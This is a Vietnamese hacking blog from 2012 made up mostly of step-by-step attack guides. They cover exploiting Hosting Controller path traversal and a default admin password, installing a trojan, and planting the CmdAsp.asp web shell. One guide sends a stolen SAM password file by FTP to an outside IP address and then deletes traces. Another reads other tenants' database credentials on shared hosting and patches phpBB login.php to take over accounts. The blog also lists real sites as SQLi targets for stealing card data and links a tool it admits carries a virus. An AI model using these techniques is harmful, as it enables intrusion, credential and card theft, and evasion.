http://bigguy.ourweb.net/AdvAdmin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\Program%20 Files\Advanced%20Communications\NT%20Web%20Hosting %20Controller\web\admin&owwwPath=C:\&oftpPath=F:\w ww-f\resadmin\ncviet\www.cuonglong.com\www
Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ bạn hãy tìm trang web của mình ở khung thứ nhất bên dưới và click vào nó rồi nhấn nút "import". Bây giờ nó đã copy trang Web của bạn vào khung thứ hai bên dưới. Ok, vậy là bạn đã Hack xong rồi đó. ví dụ bạn upload file cl.htm thì đường dẫn Web của bạn sẽ là :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Chú ý : www.victim.com sẽ được thay bằng Website bị lỗi hc. Và có thể trong quá trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang cho thật khéo .
Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và http://www.google.com rồi nhập từ khoá "Hosting Controller" cho nó Search.
Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn các ổ đĩa và các thư mục của server và ta có thể lợi dụng nó để add (thêm vào) một đường dẫn DSN để chỉ tới một địa chỉ mới. Để khai thác lỗi này bạn dùng đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= bspace\opendnsserver\target\target.com\db\..\..\.. \..\
Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục admin và thi hành những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa vào đoạn code sau :
http://www.target.com/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath= C:\&oftpPath=C:\
Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể là cả C:\) và thay đổi tùy thích..
Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user có tên là AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có thể nắm quyền điều khiển hoàn toàn server (hay 1 phần) thông qua password default cho user này là "advcomm500349", sau đó thì hack chỉ là việc dễ dàng.
Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hoặc 1 chương trình DoS (Denial of Service) vào server mà ban đã vào được để phục vụ cho công việc Hack cho mình sau này. Thường thì khi Hack qua lỗi HC bạn rất khó có thể cài thẳng chương trình vào ổ C:/ như lỗi IIS được. Nhưng chúng ta vẫn có thể cài 1 chương trình nhờ chúng ta setup qua site nằm trong server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta muốn (Cách Upload như trên đã nói). Sau đây tôi sẽ cài 1 con reaccserver có chức năng khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà mình. Tôi upload file reaccserver.exe lên site http://123hollywood.com/ .
Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau :
http://123hollywood.com/reaccserver.exe
Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông báo ở máy chứ. Đúng, thường thì các phần mềm quản lý Hosting sẽ thông báo ở máy chủ nhưng thường thì người quản lý server sẽ bỏ qua chế độ này khi cài đặt HC Khi bạn đánh dòng trên nếu thành công thì ở IE sẽ thông báo "server setup file full". Nếu không thành công nó sẽ báo "Can't not Found". Lúc này bạn hãy đánh lại :
http://123hollywood.com/../../../reaccserver.exe
Đảm bảo sẽ OK
Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó. Bạn
hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ bạn hãy dùng phần còn lại của chương trình là file cp.exe. Chúng ta có thể Shutdown hoặc Restart server kia. Thường thì server sẽ mất ít nhất 3 phút để khởi động lài .
Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là thường để các file upload.asp nằm ở trong các thư mục của Website. Vì vậy mặc dù lỗi HC có bị fix thì chúng ta cũng Hack như thường .
Đây là ví dụ : http://www.aten2000.com/aspupload_samples_docs/BothFormAndScript.asp Bạn thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ mình thử tìm cấu trúc thường c1o của 1 website cài HC nha. Bạn hãy vào đây : http://www.aten2000.com/cmd.asp để xem toàn bộ server với các lệnh dir C:\ ; dir D:\ ; dir E:\ và đọc file bằng lệnh type C:\..[đườngdẫn].. ----> Chú ý : lệnh này có thể đọc được bất cứ file nào .
Bạn thử tìm trong đó mà xem cũng có nhiều lắm .
À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho đễ. Đây
là cấu trúc của file cmd.asp :
-----------------------------------------------------------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
-------------------------------------------------------------------------------------
NTDaddy có thể download ở đây: ntdaddy download
Ở một số server, không rõ lý do ta phải dùng kết hợp cả cmdasp và ntdaddy mới hiệu quả.
Để khai thác, có 2 nguồn thông tin cực kì quan trọng mà ta cần quan tâm trước tiên, đó là database của HC và file sam._, nơi chứa tất cả các thông tin về các host trên server.
File sam._ thật ra chỉ là bản backup, có thể ko đầy đủ, thường được lưu ở winnt\repair. Bản sam đầy đủ có ở winnt\system32\config, như bị lock, rất khó lấy. Sau khi lấy được sam._, các bạn dùng l0pht hoặc Lc3 (download ở http://www.l0pht.com/ hoặc rất nhiều trên net) để crack.
Còn database của các host, thường lưu trữ ở thư mục cài đặt HC, vd như c:\program files\advanced communitations\NT web hosting\...., là một file access.
Cách download các file như thế nào!? có vài cách cho bạn, nếu bạn biết được vị trí lưu trữ data các host trên server (vd như dạng d:\users\www\democoun\www, địa chỉ này thực chất khi browse trên browser sẽ là http://www.democoun.com/ chẳng hạn - đây chỉ là vd, các bạn phải tự tìm hiểu folder cụ thể, điều này rất quan trọng), bạn có thể dùng lệnh copy, chép thẳng các file này vào thư mục trên, sau đó download thẳng xuống từ browser, như www.democoun.com/sam._ .
Cách khác là dùng ftp để send file mình muốn đến 1 địa chỉ ftp mà mình biết, bằng gõ lệnh trong cmdasp.asp hay nddaddy.asp (Cách này tôi được Kha cung cấp thông tin). Tuy nhiên, ta ko thể nhập và chạy từng lệnh tương tác ftp dùng các trình này được, bạn phải tạo 1 file text có chứa danh sách các lệnh và yêu cầu ftp chạy các lệnh đó. Cách tạo 1 filte text, ta sẽ dùng lệnh echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhập vào textbox lệnh của cmdasp và run, lệnh này sẽ tạo một file c:\dl.txt có chứa lệnh "open 111.214.156.105". Gần tương tự với các lệnh khác, vd lệnh sau sẽ thêm 1 dòng vào sau lệnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lưu ý từ câu lệnh thứ 2 trở đi, ta phải dùng ">>" thay vì ">". Các bạn làm tương tự với các lệnh còn lại, sao cho các lệnh trong dl.txt dùng để send ftp 1 file ít nhất phải có các lệnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Các lệnh trên sẽ send file c:\sam._ ở server bạn đang hack đến địa chỉ anon 111.214.156.105.
Như vậy, bạn đã tạo xong 1 script để ftp file cần. Bây giờ dùng lệnh sau để thực thi các lệnh trong dl.txt. Trước tiên, bạn chuyển về thư mục chứa dl.txt, dùng lệnh cd c:\, và nhập lệnh sau vào ô lệnh cmdasp: "ftp -n -s:c:\dl.txt" và Run!
Nếu thành công, tức là browser ko báo lỗi và chỉ hiện các thông tin kết nối ftp...thì file sam._ đã được gửi đến địa chỉ anon trên. Bạn chỉ việc ftp vào đó để download về. Sau đó bạn dùng chương trình L0phtCrack để giải mã file SAM đó
Lưu ý là các file bạn copy và download xong, hãy xóa để tránh bị phát hiện.
Muốn tìm các Website bị lỗi Hosting Controller thì bạn vào http://www.google.com rồi gõ : "allinurl:/advadmin" (không có dấu ngoặc kép) nhấn nút Google Search
Thứ Hai, 17 tháng 12, 2012
Thông báo chuyển Page Demons Team
Chào các bạn,mình là Thành viên của Demons Team , hiện tại,page của demons team đã bị hacker tấn công,vì thế chúng tôi đã chuyển sang dùng twitter ,chúng tôi sẽ ko hoạt động trên Facebook nữa
đây là link trang twitter mới của team
https://twitter.com/Demonsvn
xin cảm ơn
Chủ Nhật, 16 tháng 12, 2012
Cùng Phá Quán Nét nào
Chống Local attack part 1 By LilBuno - Demons Team
đầu tiên login dô root account
các bạn mở file "php.ini" trong pico editor
[ pico /usr/local/lib/php.ini ]
tìm "safe_mode"
[ Ctrl + W and type "safe_mode" ]
đổi Off thành On
[ "safe_mode = Off" to "safe_mode = On" ]
tìm "disabled_functions"
[ Ctrl + W and type "disabled_functions" ]
và add theo functions
[system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source]
thêm hàm này vào nữa Hàm: ini_set();
sau đó save lại
[ Ctrl + X then Y ]
retart lại Apache web server
[ /etc/init.d/httpd restart ]
cách 2
chmod và xet IP
drwxr-x--x 671 root wheel 16296 Aug 14 15:47 /home/
drwx--x--- 14 user nobody 760 Aug 17 08:10 /home/user
drwxr-xr-x 16 user user 1128 Aug 7 01:12 /home/user/public_html
thứ 3 xóa amdincp và modcp
3 cách trên k ai local dc đã thách Pro Xgr và GUG đó là FOr ML !!!! đến h Vẫn chưa ai Local dc
done. bây h hết sợ hack local rồi nhá )
chú ý nên backup php.ini trước khi bắt đầu.
các bạn mở file "php.ini" trong pico editor
[ pico /usr/local/lib/php.ini ]
tìm "safe_mode"
[ Ctrl + W and type "safe_mode" ]
đổi Off thành On
[ "safe_mode = Off" to "safe_mode = On" ]
tìm "disabled_functions"
[ Ctrl + W and type "disabled_functions" ]
và add theo functions
[system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source]
thêm hàm này vào nữa Hàm: ini_set();
sau đó save lại
[ Ctrl + X then Y ]
retart lại Apache web server
[ /etc/init.d/httpd restart ]
cách 2
chmod và xet IP
drwxr-x--x 671 root wheel 16296 Aug 14 15:47 /home/
drwx--x--- 14 user nobody 760 Aug 17 08:10 /home/user
drwxr-xr-x 16 user user 1128 Aug 7 01:12 /home/user/public_html
thứ 3 xóa amdincp và modcp
3 cách trên k ai local dc đã thách Pro Xgr và GUG đó là FOr ML !!!! đến h Vẫn chưa ai Local dc
done. bây h hết sợ hack local rồi nhá )
chú ý nên backup php.ini trước khi bắt đầu.
Thứ Bảy, 15 tháng 12, 2012
Cực hot tool check SQLi , XSS , Admin login
link
http://www.mediafire.com/?7jcos8j6bwbfd7c
chú ý
tools này có chứa virut
ae nào dám dùng thì dùng,mình dùng lâu rồi,ko ảnh hưởng gì cả
thanks
http://www.mediafire.com/?7jcos8j6bwbfd7c
chú ý
tools này có chứa virut
ae nào dám dùng thì dùng,mình dùng lâu rồi,ko ảnh hưởng gì cả
thanks
Thứ Sáu, 14 tháng 12, 2012
host free chất 100GB Diskspace - Unlimited BW
dành cho nb nhé. pro đi chổ khác chơi kẻo nát đít. site chất ko ngon ko lấy tiền Free Shared Hosting Account All the hosting you could want. 100GB disc Space Unmetered BW Unlimited FTP Accounts Unlimited MySQL account tường lửa ################################################## ################################################## ################################################## ############## ########################## ################################# ###################################### http://www.freegigs.co/clients/cart.php Nguon VHU
Thứ Ba, 11 tháng 12, 2012
List shop lỗi SQLi cho ae get cc new update
http://www.weatherguard.com/truck_tool_boxes/view_products.php?subcat_id=18
http://www.yarbroughsmusic.com/section.php?sectionID=3
http://www.martincooper.com.au/index.php?option=com_phocagallery
http://www.johnpeelcentreforcreativearts.co.uk/index.php?option=com_k2
http://www.foodpartners.com.au/foodpartners/index.php?inc=home
http://www.cardsuggest.com/index.php/walmart_money_card.html?call=default
http://ww2.providenthp.com/index.php?option=com_project
http://chemwiki.ucdavis.edu/index.php?title=VVV_Demos/Additional_Demos/An_Analogy_for_Elements_Versus_Mixtures_Versus_Compounds
http://www.wecarejacksonville.org/index.php?/about?id=1
http://www.fembotwiki.com/index.php?title=Main_Page
http://www.steam-brite.com/equipment/portable_extractors/century400.php?id=1
http://hollywoodism.net/index.php?option=com_k2
http://www.liberalhistory.org.uk/item_single.php?item_id=4
http://www.innovateonline.info/index.php?view=article
http://www.gsm4voip.com/index.php?option=com_k2
http://hedbib.iau-aiu.net/login.php?lang=en
http://theafricareport.com/Blog/index.php?post/2009/09/15/Kenyan-higher-education-is-a-luxury-for-the-poor%2C-a-commodity-for-the-rich?id=1
http://www.golocaljamaica.com/readarticle.php?ArticleID=2457
http://www.into-asia.com/thai_language/how_to_speak_thai.php?id=1
http://www.fishbase.org/search.php?lang=English
http://www.ibdb.com/person.php?id=57772
http://pbskids.org/toopyandbinoo/index.php?ID=MAGC3JEU3
http://college-graduation-announcements.signaturea.com/index.php?page=category
http://www.hazelwoodmo.org/index.php?view=venueevents
http://www.rainwater-toolkit.net/index.php?id=21
http://www.school-video-news.com/index.php?option=com_content
http://www.oklahomacitynationalmemorial.org/secondary.php?section=2
http://www.aviointeriors.it/index.php?option=com_k2
http://www.a-bike.co.uk/store/home.php?id=1
http://www.medeco.com/index.php?option=com_content
http://www.syriantalent.com/job-details.php?jo_id=1507
http://www.magnoliahomes.net/index.php?id=3
http://www.amnesty.ca/atrisk/index.php/father-alejandro-solalinde/?id=1
http://www.qmsonline.com/index.php?view=items
http://www.hoertechnik-audiologie.de/web/file/Forschung/Software.php?id=1
http://www.beyondcredentials.com/index.php?option=com_lyftenbloggie
http://www.gigaprint.co.uk/product.php?nid=16
http://www.alexandrahospital.org.au/index.php?page=organisational-structure
http://www.awtrey.com/tutorials/dbeweb/database.php?id=1
http://www.cachecounty.org/auditor/proceed.php?id=1
http://www.bellegrove.org/index.php?/calendar?id=1
http://www.millerandsmith.com/index.php?component=community
http://aabe.org/index.php?component=pages
http://openclassroom.stanford.edu/MainFolder/CoursePage.php?course=PracticalUnix
http://www.theblackvault.com/wiki/index.php/Reptilian_humanoid?id=1
http://theindustryexposed.com/index.php?option=com_k2
http://unfccc4.meta-fusion.com/kongresse/cop17/templ/ovw_onDemand.php?id_kongressmain=201
http://schoolmarm.org/main/index.php?page=p-genphil
http://www.gratitudecampaign.org/index.php?c=pages
http://www.timingcharts.com/index.php?id=1
http://www.weahunter.com.au/index.php?show_section_id=16
http://www.drazam.com/index.php?p=1_8_Education-Teaching-Programme
http://www.jtj.com.au/index.php?option=com_sectionex
http://www.altsupportthyroid.org/tsh.php?id=1
http://jettent.com/index.php?option=com_improducts
http://www.bristowgroup.com/careers/positions.php?id=1
http://www.costaricamap-online.com/php/map01/map0101.php?id=1
http://www.societyofrobots.com/robotforum/index.php?id=1
http://redcatjazzcafe.com/index.php?id=1
http://www.preventioninstitute.org/index.php?option=com_jlibrary
http://www.dia.uniroma3.it/~compunet/www/view/person.php?id=gdb
http://www.iftomm.org/index.php?option=com_iftommmembers
http://www.bbmmlsu.in/index.php?option=com_k2
http://22q.org/22q_zoo.php?id=1
http://santaclarita.taptogo.net/main.php?cn=santaclarita
http://www.fujifilmimagine.com/imagine/app.php?userGroupID=162
http://devspade.com/index.php/2011/02/17/getting-to-hello-world-ruby-on-rails-on-windows/?id=1
http://www.collegepharmacy.com/index.php?/site/detail/biologically_identical_hrt?id=1
http://www.wmsr.com/attraction.php?attraction=273
http://www.lamayeshe.com/index.php?sect=article
http://sexynepaligirls.com/index.php?option=com_phocagallery
http://www.lingsmoment.com/index.php?id=1
http://www.loosco.com/index.php?page=loos-hardware
http://www.totalescape.com/destin/california-towns.php?tid=214
http://www.icprofessor.com/index.php?id=1
http://www.cutlerhomes.com/getagent/list.php?oid=000500001
http://onepiece.viz.com/volumes/product.php?volume=32
http://needtoknow.nas.edu/energy/energy-sources/emerging-technologies/conventional-oil-alternatives.php?id=1
http://cloverfield.despoiler.org/index.php?title=Slusho
http://healthwyze.org/index.php/eliminating-parasites.html?id=1
http://www.countrycodes.com/search_usa.php?t=250
http://www.sbig.com/news.php?id=1
http://remoteplanet.co.uk/products.php?product=Attacker-1%7B47%7D8-Nitro-Rc-Buggy-%252d-Remote-Starter-Version
http://www.bulldawgmfg.com/index.php?option=com_ixxocart
http://www.heteroptera.ucr.edu/index.php?option=com_content
http://www.thepoultrysite.com/forums/showthread.php?t=730
http://steppingup.ysf-fsj.ca/index.php/Different_graphs_for_different_purposes?id=1
http://www.freshjoomlatemplates.com/wp-content/plugins/download-monitor/download.php?id=24
http://forums.smallbusinesscomputing.com/showthread.php?t=497
http://www.charlestoncoffeeroasters.com/v.php?pg=12
http://weavertheme.com/wp-content/plugins/download-monitor/download.php?id=1
http://rod.co.robeson.nc.us/search.php?id=1
Thứ Hai, 10 tháng 12, 2012
Sqli-labs series
Link to part 1: http://www.securitytube.net/video/4171
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176
Link for test bed: https://github.com/Audi-1/sqli-labs
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176
Link for test bed: https://github.com/Audi-1/sqli-labs
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Chủ Nhật, 9 tháng 12, 2012
Nhận dạng các loại mã hóa
1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự 3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự
DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự
$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự
$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự
Thêm một cách hack Local Site
Nội dung bài viết của Admin trên diễn đàn HVA -2002
###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
